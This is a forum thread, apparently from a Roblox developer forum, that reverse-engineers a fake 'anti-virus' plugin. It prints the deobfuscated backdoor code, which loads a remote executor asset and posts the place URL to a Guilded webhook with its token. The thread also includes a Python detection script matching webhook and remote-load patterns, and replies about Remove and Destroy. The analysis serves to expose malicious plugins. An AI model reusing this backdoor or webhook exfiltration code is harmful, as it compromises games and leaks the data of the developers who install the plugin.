Reverse-engineering malicious plugins #1

ah yes, an ANTIVIRUSANTIVIRUSANTIVIRUS plugin.

let's get this in game, shall we?


seems legit (btw completely rips off @Alligator_Lizard125 Anti-Virus Plugin)
but why are there 3821 spaces at the end of the script?

hmm, let's see where this goes to :wink:

code obfuscated with moonsec and vLua :uhh:
since I'm too lazy to constant dump moonsec, let's just edit the vLua code and see what it does

  21:53:35.881  
-- loads a remote asset by numeric ID into the place (the "server-side executor")
local exe = game:GetService("InsertService"):LoadAsset(1421511821)
local success, Error = pcall(function(...)
	-- embed payload: the place URL of whoever installed the plugin
	local k = {
		['embeds'] = {{
			['title'] = "**Onyx SS**",
			['description'] = "https://www.roblox.com/games/" .. game.PlaceId
		}}
	}
	-- `http` is not defined anywhere in this dumped fragment
	local v = http:JSONEncode(k)
	-- reports the place ID to a guilded webhook (this is the call that gets deleted below)
	game:GetService("HttpService"):PostAsync("https://media.guilded.gg/webhooks/9a4e6092-4080-41e0-b651-b6125c6e9eb3/Uwtah8NquWqOCmUk4EimCKWMOmG8OWWco8a04oYmakeqmYmQUOOwckAWYoE0ii84eUG6O0YioaOeUw2yuoweAI", v)
end)

now let’s delete the webhook and see our free new server-side executor we got!!!

bruh this is trash :skull: :skull:

this reverse engineer was made by Kealomon Productions (more coming soon)

13 Likes
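A small triage script for dumped plugin source, added here as an example and not part of the original post or the plugin. It looks for the traits the post calls out: a remote InsertService:LoadAsset with a numeric ID, an HttpService post to a webhook host, obfuscator markers, the decorative "isVirus = false", and a large run of trailing whitespace used to push the payload off-screen. The sample source, the webhook placeholder URL and the indicator weights are all constructed for this example.

```python
import re

# Constructed sample plugin source, modelled on the thread's description:
# an "anti-virus" plugin padded with thousands of trailing spaces, with an
# obfuscator marker, a remote asset load and a webhook post. The webhook URL
# is a placeholder, not the one from the dump.
SAMPLE_PLUGIN_SOURCE = (
    "-- Anti-Virus Plugin\n"
    "local isVirus = false\n"
    "-- moonsec obfuscated payload below\n"
    'local exe = game:GetService("InsertService"):LoadAsset(1421511821)\n'
    'game:GetService("HttpService"):PostAsync('
    '"https://media.guilded.gg/webhooks/WEBHOOK-ID-PLACEHOLDER/TOKEN-PLACEHOLDER", v)\n'
    + " " * 3821
)

# Each indicator is (name, compiled regex). Service lookups and method calls are
# matched loosely (up to 40 chars apart) so quoting and spacing variants still hit.
INDICATORS = [
    ("remote_asset_load", re.compile(r"InsertService.{0,40}LoadAsset\s*\(\s*\d+", re.S)),
    ("http_post", re.compile(r"HttpService.{0,40}(?:PostAsync|RequestAsync)", re.S)),
    ("webhook_url", re.compile(
        r"https?://[^\"'\s]*(?:guilded\.gg|discord(?:app)?\.com)/[^\"'\s]*webhooks?/", re.I)),
    ("obfuscator_marker", re.compile(r"moonsec|vlua|loadstring\s*\(", re.I)),
    ("self_declared_clean", re.compile(r"isVirus\s*=\s*false")),
]

# Constructed weights: network exfil and remote code load count most.
WEIGHTS = {
    "webhook_url": 3,
    "remote_asset_load": 3,
    "http_post": 2,
    "obfuscator_marker": 2,
    "trailing_padding": 1,
    "self_declared_clean": 1,
}


def trailing_whitespace_padding(source: str) -> int:
    """Number of space/tab characters at the very end of the source."""
    return len(source) - len(source.rstrip(" \t"))


def triage_plugin_source(source: str, padding_threshold: int = 200) -> dict:
    """Map each indicator that fired to the snippets it matched."""
    findings = {}
    for name, pattern in INDICATORS:
        hits = [m.group(0) for m in pattern.finditer(source)]
        if hits:
            findings[name] = hits
    padding = trailing_whitespace_padding(source)
    if padding >= padding_threshold:
        findings["trailing_padding"] = [f"{padding} trailing whitespace characters"]
    return findings


def risk_score(findings: dict) -> int:
    """Sum the weights of the indicators that fired (unknown keys score 0)."""
    return sum(WEIGHTS.get(name, 0) for name in findings)


if __name__ == "__main__":
    result = triage_plugin_source(SAMPLE_PLUGIN_SOURCE)
    for name, hits in result.items():
        print(f"[{name}] {hits[0][:80]}")
    print("risk score:", risk_score(result))
```

Run it over each script in a plugin you are about to install; a script that both loads a remote asset and posts to a webhook host is worth reading by hand before it ever reaches a place.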

I love how they added isVirus = false lol like that proves something

8 Likes

Also love how they casually add comments telling the reader about what each section of the plugin opening code is for.

It’s just so insane that they can just do virus:remove().

2 Likes

I think they copied from a template or passed it thru ChatGPT, I don’t even know

4 Likes

lol the fact that they didn’t even wrap the vLua module in the main script itself says something about their level

2 Likes

Pretty interesting overall, but how exactly were you able to print original source code by changing a single line of code in this vLua module to print something?

:remove() is the old version of :Delete()
it only exists in lowercase form so the uppercase :Delete() is bizarre

3 Likes

This is wrong, remove works both lowercase and capital. Remove is not the old version of Delete, delete literally doesn't exist. Do you mean "Destroy"? Remove and Destroy are completely separate. Remove just sets the object parent to nil, while Destroy does much more and was intended to replace Remove entirely, completely deprecating the old functionality.

This in particular calls “Remove” because it actually allows the virus to continue executing.

2 Likes

I honestly don't think it's called :Delete(), it's :Destroy(). Thanks.

2 Likes

So what does DebrisService do? Doesn’t it do the same?

2 Likes

DebrisService calls destroy after a period of time.

Debris:AddItem(Instance, 10) will destroy it in 10 seconds. However, if there is an overflow and the maximum number of entries has been hit, it will start destroying immediately until the queue is below the maximum again. The maximum number of entries is dynamically set and within the hundreds of thousands.

4 Likes

That’s pretty interesting.
Quite intriguing to see how those backdoors worked.

I'm wondering if you're able to edit what the guilded notification says :3